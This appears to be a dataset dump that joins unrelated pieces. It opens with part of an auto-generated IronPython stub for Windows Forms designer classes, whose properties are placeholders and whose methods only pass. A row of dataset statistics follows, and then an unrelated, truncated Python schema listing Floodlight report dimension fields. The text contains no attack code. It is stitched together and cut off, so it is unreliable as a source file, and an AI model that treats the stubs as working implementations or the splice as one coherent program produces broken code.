"""Specifies whether the editor should apply its changes before it is deactivated.
Get: CommitOnDeactivate(self: ComponentEditorPage) -> bool
Set: CommitOnDeactivate(self: ComponentEditorPage) = value
"""
Component = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the component to edit.
"""
CreateParams = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the creation parameters for the control.
"""
DefaultCursor = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the default cursor for the control.
"""
DefaultImeMode = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the default Input Method Editor (IME) mode supported by the control.
"""
DefaultMargin = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the space, in pixels, that is specified by default between controls.
"""
DefaultMaximumSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the length and height, in pixels, that is specified as the default maximum size of a control.
"""
DefaultMinimumSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the length and height, in pixels, that is specified as the default minimum size of a control.
"""
DefaultPadding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the internal spacing, in pixels, of the contents of a control.
"""
DefaultSize = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
DesignMode = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value that indicates whether the System.ComponentModel.Component is currently in design mode.
"""
DoubleBuffered = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether this control should redraw its surface using a secondary buffer to reduce or prevent flicker.
"""
Events = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the list of event handlers that are attached to this System.ComponentModel.Component.
"""
FirstActivate = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the page is being activated for the first time.
"""
FontHeight = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the height of the font of the control.
"""
HScroll = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the horizontal scroll bar is visible.
"""
Icon = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the icon for the page.
Get: Icon(self: ComponentEditorPage) -> Icon
Set: Icon(self: ComponentEditorPage) = value
"""
ImeModeBase = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the IME mode of a control.
"""
Loading = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Indicates how many load dependencies remain until loading has been completed.
"""
LoadRequired = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether a component must be loaded before editing can occur.
"""
PageSite = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the page site.
"""
RenderRightToLeft = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""This property is now obsolete.
"""
ResizeRedraw = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the control redraws itself when resized.
"""
ScaleChildren = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value that determines the scaling of child controls.
"""
ShowFocusCues = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the control should display focus rectangles.
"""
ShowKeyboardCues = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets a value indicating whether the user interface is in the appropriate state to show or hide keyboard accelerators.
"""
Title = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the title of the page.
Get: Title(self: ComponentEditorPage) -> str
"""
VScroll = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets a value indicating whether the vertical scroll bar is visible.
"""
AutoSizeChanged = None
class PropertyTab(object, IExtenderProvider):
""" Provides a base class for property tabs. """
def CanExtend(self, extendee):
"""
CanExtend(self: PropertyTab, extendee: object) -> bool
Gets a value indicating whether this System.Windows.Forms.Design.PropertyTab can display
properties for the specified component.
extendee: The object to test.
Returns: true if the object can be extended; otherwise, false.
"""
pass
def Dispose(self):
"""
Dispose(self: PropertyTab)
Releases all the resources used by the System.Windows.Forms.Design.PropertyTab.
"""
pass
def GetDefaultProperty(self, component):
"""
GetDefaultProperty(self: PropertyTab, component: object) -> PropertyDescriptor
Gets the default property of the specified component.
component: The component to retrieve the default property of.
Returns: A System.ComponentModel.PropertyDescriptor that represents the default property.
"""
pass
def GetProperties(self, *__args):
"""
GetProperties(self: PropertyTab, context: ITypeDescriptorContext, component: object, attributes: Array[Attribute]) -> PropertyDescriptorCollection
Gets the properties of the specified component that match the specified attributes and context.
context: An System.ComponentModel.ITypeDescriptorContext that indicates the context to retrieve
properties from.
component: The component to retrieve properties from.
attributes: An array of type System.Attribute that indicates the attributes of the properties to retrieve.
Returns: A System.ComponentModel.PropertyDescriptorCollection that contains the properties matching the
specified context and attributes.
GetProperties(self: PropertyTab, component: object, attributes: Array[Attribute]) -> PropertyDescriptorCollection
Gets the properties of the specified component that match the specified attributes.
component: The component to retrieve properties from.
attributes: An array of type System.Attribute that indicates the attributes of the properties to retrieve.
Returns: A System.ComponentModel.PropertyDescriptorCollection that contains the properties.
GetProperties(self: PropertyTab, component: object) -> PropertyDescriptorCollection
Gets the properties of the specified component.
component: The component to retrieve the properties of.
Returns: A System.ComponentModel.PropertyDescriptorCollection that contains the properties of the
component.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self, *args): #cannot find CLR method
""" __repr__(self: object) -> str """
pass
Bitmap = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the bitmap that is displayed for the System.Windows.Forms.Design.PropertyTab.
Get: Bitmap(self: PropertyTab) -> Bitmap
"""
Components = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets or sets the array of components the property tab is associated with.
Get: Components(self: PropertyTab) -> Array[object]
Set: Components(self: PropertyTab) = value
"""
HelpKeyword = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the Help keyword that is to be associated with this tab.
Get: HelpKeyword(self: PropertyTab) -> str
"""
TabName = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the name for the property tab.
Get: TabName(self: PropertyTab) -> str
"""
class EventsTab(PropertyTab, IExtenderProvider):
"""
Provides a System.Windows.Forms.Design.PropertyTab that can display events for selection and linking.
EventsTab(sp: IServiceProvider)
"""
def CanExtend(self, extendee):
"""
CanExtend(self: EventsTab, extendee: object) -> bool
Gets a value indicating whether the specified object can be extended.
extendee: The object to test for extensibility.
Returns: true if the specified object can be extended; otherwise, false.
"""
pass
def Dispose(self):
"""
Dispose(self: PropertyTab, disposing: bool)
Releases the unmanaged resources used by the System.Windows.Forms.Design.PropertyTab and
optionally releases the managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def GetDefaultProperty(self, obj):
"""
GetDefaultProperty(self: EventsTab, obj: object) -> PropertyDescriptor
Gets the default property from the specified object.
obj: The object to retrieve the default property of.
Returns: A System.ComponentModel.PropertyDescriptor indicating the default property.
"""
pass
def GetProperties(self, *__args):
"""
GetProperties(self: EventsTab, context: ITypeDescriptorContext, component: object, attributes: Array[Attribute]) -> PropertyDescriptorCollection
Gets all the properties of the event tab that match the specified attributes and context.
context: An System.ComponentModel.ITypeDescriptorContext that can be used to gain context information.
component: The component to retrieve the properties of.
attributes: An array of type System.Attribute that indicates the attributes of the event properties to
retrieve.
Returns: A System.ComponentModel.PropertyDescriptorCollection that contains the properties. This will be
an empty System.ComponentModel.PropertyDescriptorCollection if the component does not implement
an event service.
GetProperties(self: EventsTab, component: object, attributes: Array[Attribute]) -> PropertyDescriptorCollection
Gets all the properties of the event tab that match the specified attributes.
component: The component to retrieve the properties of.
attributes: An array of System.Attribute that indicates the attributes of the event properties to retrieve.
Returns: A System.ComponentModel.PropertyDescriptorCollection that contains the properties. This will be
an empty System.ComponentModel.PropertyDescriptorCollection if the component does not implement
an event service.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, sp):
""" __new__(cls: type, sp: IServiceProvider) """
pass
HelpKeyword = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the Help keyword for the tab.
Get: HelpKeyword(self: EventsTab) -> str
"""
TabName = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the name of the tab.
Get: TabName(self: EventsTab) -> str
"""
class IUIService:
""" Enables interaction with the user interface of the development environment object that is hosting the designer. """
def CanShowComponentEditor(self, component):
"""
CanShowComponentEditor(self: IUIService, component: object) -> bool
Indicates whether the component can display a System.Windows.Forms.Design.ComponentEditorForm.
component: The component to check for support for displaying a
System.Windows.Forms.Design.ComponentEditorForm.
Returns: true if the specified component can display a component editor form; otherwise, false.
"""
pass
def GetDialogOwnerWindow(self):
"""
GetDialogOwnerWindow(self: IUIService) -> IWin32Window
Gets the window that should be used as the owner when showing dialog boxes.
Returns: An System.Windows.Forms.IWin32Window that indicates the window to own any child dialog boxes.
"""
pass
def SetUIDirty(self):
"""
SetUIDirty(self: IUIService)
Sets a flag indicating the UI has changed.
"""
pass
def ShowComponentEditor(self, component, parent):
"""
ShowComponentEditor(self: IUIService, component: object, parent: IWin32Window) -> bool
Attempts to display a System.Windows.Forms.Design.ComponentEditorForm for a component.
component: The component for which to display a System.Windows.Forms.Design.ComponentEditorForm.
parent: The System.Windows.Forms.IWin32Window to parent any dialog boxes to.
Returns: true if the attempt is successful; otherwise, false.
"""
pass
def ShowDialog(self, form):
"""
ShowDialog(self: IUIService, form: Form) -> DialogResult
Attempts to display the specified form in a dialog box.
form: The System.Windows.Forms.Form to display.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned by the
dialog box.
"""
pass
def ShowError(self, *__args):
"""
ShowError(self: IUIService, ex: Exception, message: str)
Displays the specified exception and information about the exception in a message box.
ex: The System.Exception to display.
message: A message to display that provides information about the exception.
ShowError(self: IUIService, ex: Exception)
Displays the specified exception and information about the exception in a message box.
ex: The System.Exception to display.
ShowError(self: IUIService, message: str)
Displays the specified error message in a message box.
message: The error message to display.
"""
pass
def ShowMessage(self, message, caption=None, buttons=None):
"""
ShowMessage(self: IUIService, message: str, caption: str, buttons: MessageBoxButtons) -> DialogResult
Displays the specified message in a message box with the specified caption and buttons to place
on the dialog box.
message: The message to display.
caption: The caption for the dialog box.
buttons: One of the System.Windows.Forms.MessageBoxButtons values:
System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxButtons.OKCancel,
System.Windows.Forms.MessageBoxButtons.YesNo, or
System.Windows.Forms.MessageBoxButtons.YesNoCancel.
Returns: One of the System.Windows.Forms.DialogResult values indicating the result code returned by the
dialog box.
ShowMessage(self: IUIService, message: str, caption: str)
Displays the specified message in a message box with the specified caption.
message: The message to display.
caption: The caption for the message box.
ShowMessage(self: IUIService, message: str)
Displays the specified message in a message box.
message: The message to display
"""
pass
def ShowToolWindow(self, toolWindow):
"""
ShowToolWindow(self: IUIService, toolWindow: Guid) -> bool
Displays the specified tool window.
toolWindow: A System.Guid identifier for the tool window. This can be a custom System.Guid or one of the
predefined values from System.ComponentModel.Design.StandardToolWindows.
Returns: true if the tool window was successfully shown; false if it could not be shown or found.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
Styles = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the collection of styles that are specific to the host's environment.
Get: Styles(self: IUIService) -> IDictionary
"""
class IWindowsFormsEditorService:
""" Provides an interface for a System.Drawing.Design.UITypeEditor to display Windows Forms or to display a control in a drop-down area from a property grid control in design mode. """
def CloseDropDown(self):
"""
CloseDropDown(self: IWindowsFormsEditorService)
Closes any previously opened drop down control area.
"""
pass
def DropDownControl(self, control):
"""
DropDownControl(self: IWindowsFormsEditorService, control: Control)
Displays the specified control in a drop down area below a value field of the property grid that
provides this service.
control: The drop down list System.Windows.Forms.Control to open.
"""
pass
def ShowDialog(self, dialog):
"""
ShowDialog(self: IWindowsFormsEditorService, dialog: Form) -> DialogResult
Shows the specified System.Windows.Forms.Form.
dialog: The System.Windows.Forms.Form to display.
Returns: A System.Windows.Forms.DialogResult indicating the result code returned by the
System.Windows.Forms.Form.
"""
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class ToolStripItemDesignerAvailability(Enum, IComparable, IFormattable, IConvertible):
"""
Specifies controls that are visible in the designer.
enum (flags) ToolStripItemDesignerAvailability, values: All (15), ContextMenuStrip (4), MenuStrip (2), None (0), StatusStrip (8), ToolStrip (1)
"""
def __eq__(self, *args): #cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): #cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): #cannot find CLR method
pass
def __gt__(self, *args): #cannot find CLR method
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): #cannot find CLR method
pass
def __lt__(self, *args): #cannot find CLR method
pass
def __ne__(self, *args): #cannot find CLR method
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
def __str__(self, *args): #cannot find CLR method
pass
All = None
ContextMenuStrip = None
MenuStrip = None
None = None
StatusStrip = None
ToolStrip = None
value__ = None
class ToolStripItemDesignerAvailabilityAttribute(Attribute, _Attribute):
"""
Specifies which types a System.Windows.Forms.ToolStripItem can appear in. This class cannot be inherited.
ToolStripItemDesignerAvailabilityAttribute()
ToolStripItemDesignerAvailabilityAttribute(visibility: ToolStripItemDesignerAvailability)
"""
def Equals(self, obj):
"""
Equals(self: ToolStripItemDesignerAvailabilityAttribute, obj: object) -> bool
obj: An System.Object to compare with this instance or null.
Returns: true if obj equals the type and value of this instance; otherwise, false.
"""
pass
def GetHashCode(self):
"""
GetHashCode(self: ToolStripItemDesignerAvailabilityAttribute) -> int
Returns: A 32-bit signed integer hash code.
"""
pass
def IsDefaultAttribute(self):
"""
IsDefaultAttribute(self: ToolStripItemDesignerAvailabilityAttribute) -> bool
When overriden in a derived class, indicates whether the value of this instance is the default
value for the derived class.
Returns: true if this instance is the default attribute for the class; otherwise, false.
"""
pass
def __eq__(self, *args): #cannot find CLR method
""" x.__eq__(y) <==> x==y """
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, visibility=None):
"""
__new__(cls: type)
__new__(cls: type, visibility: ToolStripItemDesignerAvailability)
"""
pass
def __ne__(self, *args): #cannot find CLR method
pass
ItemAdditionVisibility = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""Gets the visibility of a System.Windows.Forms.ToolStripItem.
Get: ItemAdditionVisibility(self: ToolStripItemDesignerAvailabilityAttribute) -> ToolStripItemDesignerAvailability
"""
Default = None
class WindowsFormsComponentEditor(ComponentEditor):
""" Provides a base class for editors that use a modal dialog to display a properties page similar to an ActiveX control's property page. """
def EditComponent(self, *__args):
"""
EditComponent(self: WindowsFormsComponentEditor, context: ITypeDescriptorContext, component: object, owner: IWin32Window) -> bool
Creates an editor window that allows the user to edit the specified component.
context: An System.ComponentModel.ITypeDescriptorContext that can be used to gain additional context
information.
component: The component to edit.
owner: An System.Windows.Forms.IWin32Window that the component belongs to.
Returns: true if the component was changed during editing; otherwise, false.
EditComponent(self: WindowsFormsComponentEditor, component: object, owner: IWin32Window) -> bool
Creates an editor window that allows the user to edit the specified component, using the
specified window that owns the component.
component: The component to edit.
owner: An System.Windows.Forms.IWin32Window that the component belongs to.
Returns: true if the component was changed during editing; otherwise, false.
EditComponent(self: WindowsFormsComponentEditor, context: ITypeDescriptorContext, component: object) -> bool
Creates an editor window that allows the user to edit the specified component, using the
specified context information.
context: An System.ComponentModel.ITypeDescriptorContext that can be used to gain additional context
information.
component: The component to edit.
Returns: true if the component was changed during editing; otherwise, false.
"""
pass
def GetComponentEditorPages(self, *args): #cannot find CLR method
"""
GetComponentEditorPages(self: WindowsFormsComponentEditor) -> Array[Type]
Gets the component editor pages associated with the component editor.
Returns: An array of component editor pages.
"""
pass
def GetInitialComponentEditorPageIndex(self, *args): #cannot find CLR method
"""
GetInitialComponentEditorPageIndex(self: WindowsFormsComponentEditor) -> int
Gets the index of the initial component editor page for the component editor to display.
Returns: The index of the component editor page that the component editor will initially display.
"""
pass
| 39.039885 | 377 | 0.606257 | 16,875 | 162,484 | 5.80877 | 0.05997 | 0.051906 | 0.077676 | 0.064087 | 0.864216 | 0.850862 | 0.826051 | 0.817584 | 0.810391 | 0.805495 | 0 | 0.000597 | 0.319619 | 162,484 | 4,161 | 378 | 39.049267 | 0.88608 | 0.052177 | 0 | 0.871116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.449942 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
70eeb63e25ce0d4db1bac3b66b9f2fd564c5c902 | 21,896 | py | Python | util/dcm/schema/Floodlight_Report_Dimensions.py | rantwijk/starthinker | fd2d70e39f05cb29afc65b8a78ea38441e1e2b9a | [
"Apache-2.0"
] | null | null | null | util/dcm/schema/Floodlight_Report_Dimensions.py | rantwijk/starthinker | fd2d70e39f05cb29afc65b8a78ea38441e1e2b9a | [
"Apache-2.0"
] | 204 | 2019-08-29T04:58:17.000Z | 2021-07-30T04:27:07.000Z | util/dcm/schema/Floodlight_Report_Dimensions.py | rantwijk/starthinker | fd2d70e39f05cb29afc65b8a78ea38441e1e2b9a | [
"Apache-2.0"
] | null | null | null | ###########################################################################
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
Floodlight_Report_Dimensions_Schema = [
{ "name":"Activity", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Activity_Group", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Activity_Group_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Activity_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Activity_Date_Time", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Ad", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Ad_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Ad_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Advertiser", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Advertiser_Group", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Advertiser_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Asset", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Asset_Category", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Asset_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Asset_Orientation", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Audience_Targeted", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Browser_Platform", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Campaign", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Campaign_End_Date", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Campaign_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Campaign_Start_Date", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Channel_Mix", "type":"STRING", "mode":"NULLABLE" },
{ "name":"City", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Click_Count", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Click_Through_Url", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Connection_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Conversion_Referrer", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Conversion_Url", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Country", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative_Groups_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative_Groups_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Creative_Pixel_Size", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative_Version", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Rich_Media_Custom_Event_Count", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Rich_Media_Custom_Event_Path_Summary", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Date", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Days_Since_Attributed_Interaction", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Days_Since_First_Interaction", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Designated_Market_Area_Dma", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1_Field_Value_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1_Field_Value_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1_Field_Value_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1_Value_Id", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2_Field_Value_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2_Field_Value_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2_Field_Value_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2_Value_Id", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3_Field_Value_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3_Field_Value_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3_Field_Value_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3_Value_Id", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4_Field_Value_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4_Field_Value_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4_Field_Value_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4_Value_Id", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5_Field_Value_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5_Field_Value_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5_Field_Value_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5_Value_Id", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Profile", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Profile_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Floodlight_Attribution_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Configuration", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_4", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_5", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_6", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_7", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_8", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_9", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_10", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_11", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_12", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_13", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_14", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_15", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_16", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_17", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_18", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_19", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_20", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_21", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_22", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_23", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_24", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_25", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_26", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_27", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_28", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_29", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_30", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_31", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_32", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_33", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_34", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_35", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_36", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_37", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_38", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_39", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_40", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_41", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_42", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_43", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_44", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_45", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_46", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_47", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_48", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_49", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_50", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_51", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_52", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_53", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_54", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_55", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_56", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_57", "type":"STRING", "mode":"NULLABLE" },
